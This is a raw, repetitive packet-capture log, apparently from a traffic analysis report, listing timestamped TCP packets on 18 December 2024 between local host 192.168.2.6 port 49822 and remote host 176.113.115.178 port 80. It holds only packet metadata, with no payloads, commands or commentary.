                                                                  Dec 18, 2024 13:49:47.334388971 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.334402084 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.334492922 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.335321903 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.335335016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.335414886 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.336263895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.336278915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.336345911 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.338172913 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.338188887 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.338202953 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.338274002 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.338274002 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.339639902 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.339653969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.339709044 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.344172001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344191074 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344203949 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344300985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344310045 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.344316006 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344326019 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344331980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344337940 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344343901 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.344531059 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.345603943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.345618010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.345653057 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.346554995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.346568108 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.346580029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.346647024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.346647024 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.347492933 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.348484039 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.348536015 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.349565029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.349853992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.349869013 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.349942923 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.399985075 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522289038 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522303104 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522325039 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522349119 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522351027 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522351980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522371054 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522373915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522389889 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522403002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522417068 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522437096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522437096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522449017 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522454977 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522463083 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522475958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522489071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522511959 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522525072 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522542953 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522542953 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522557020 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522559881 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522571087 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522609949 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522618055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522629976 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522644997 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522660971 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522671938 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522692919 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522705078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522715092 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522718906 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522732019 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522763014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522774935 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522774935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522774935 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522789955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522804022 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522816896 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522828102 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522842884 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522842884 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522862911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522872925 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522881031 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522895098 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522907019 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522919893 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522929907 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522941113 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522977114 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.522986889 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522986889 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.522989988 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523005962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523017883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523047924 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523060083 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523063898 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523075104 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523087025 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523098946 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523102045 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523113966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523148060 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523159981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523166895 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523166895 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523173094 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523186922 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523199081 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523199081 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523211002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523230076 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523245096 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523256063 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523277044 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523278952 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523292065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.523298025 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523298025 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523416042 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.523416042 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.530857086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.531008005 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.547066927 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.548465014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.548479080 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.548491001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.548571110 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.548571110 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.561429977 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.564143896 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.564157963 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.564209938 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.565931082 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.565946102 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.566014051 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.568598032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.568682909 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.570444107 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.570828915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.570996046 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.571024895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.571976900 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.572114944 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.574330091 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.576615095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.576627016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.576910973 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.579557896 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.579571962 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.579582930 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.579638004 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.579674959 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.585855961 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.585870028 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.585966110 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.588234901 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.588248968 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.588321924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.591237068 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.594116926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.594130039 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.594218016 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.597345114 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.597358942 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.597428083 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.599618912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.599747896 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.602443933 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.602458954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.602680922 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.604763985 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.604787111 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.604799032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.604892015 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.605559111 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.605572939 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.605635881 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.606677055 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.606689930 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.606906891 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.608515024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.608875990 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.609570980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.609585047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.609700918 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.610454082 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.610467911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.610479116 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.610632896 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.611560106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.611572981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.611752033 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.677076101 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.677210093 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.677352905 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.677783966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.678276062 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.678369045 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.679007053 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.679356098 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.679409981 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.679848909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.680409908 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.680515051 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.680928946 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.680946112 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.681062937 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.682176113 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.682656050 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.682827950 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.683078051 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.683089018 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.683232069 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.684077024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.684665918 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.684767962 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.685142994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.685154915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.685234070 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.686748028 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.687277079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.687335014 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.687711000 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.687722921 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.687781096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.688796997 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.688811064 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.688940048 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.689785957 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.689796925 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.689965963 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.690844059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.690856934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.690922022 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.691934109 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.691972971 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.692192078 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.692990065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.693001986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.693063974 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.694222927 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.694233894 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.694350004 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.695178032 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.695188999 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.695257902 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.696333885 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.696346045 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.696412086 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.697185993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.697197914 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.697266102 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.698333025 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.698344946 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.698438883 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.699268103 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.699280024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.699338913 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.700335026 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.700345993 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.700419903 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.701389074 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.701401949 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.701440096 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.702475071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.702488899 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.702536106 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.703521013 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.703532934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.703572989 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.704633951 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.704648018 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.704715967 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.705699921 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.706130981 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.706141949 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.706218958 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.707267046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.707279921 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.707334042 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.708435059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.708447933 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.708524942 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.709608078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.709619999 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.709680080 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.710762024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.710773945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.710783958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.710828066 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.710829020 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.711934090 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.711946964 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.712008953 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.713021040 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.713032007 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.713104010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.713980913 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.713992119 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.714099884 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.715065956 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.715078115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.715219975 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.716069937 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.716083050 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.716204882 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.717159033 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.717170954 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.717262983 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.718394041 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.718414068 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.718508005 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.719468117 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.719480991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.720207930 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.720308065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.720319986 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.720381021 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.721340895 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.721354008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:47.721395016 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:47.722475052 CET8049822176.113.115.178192.168.2.6
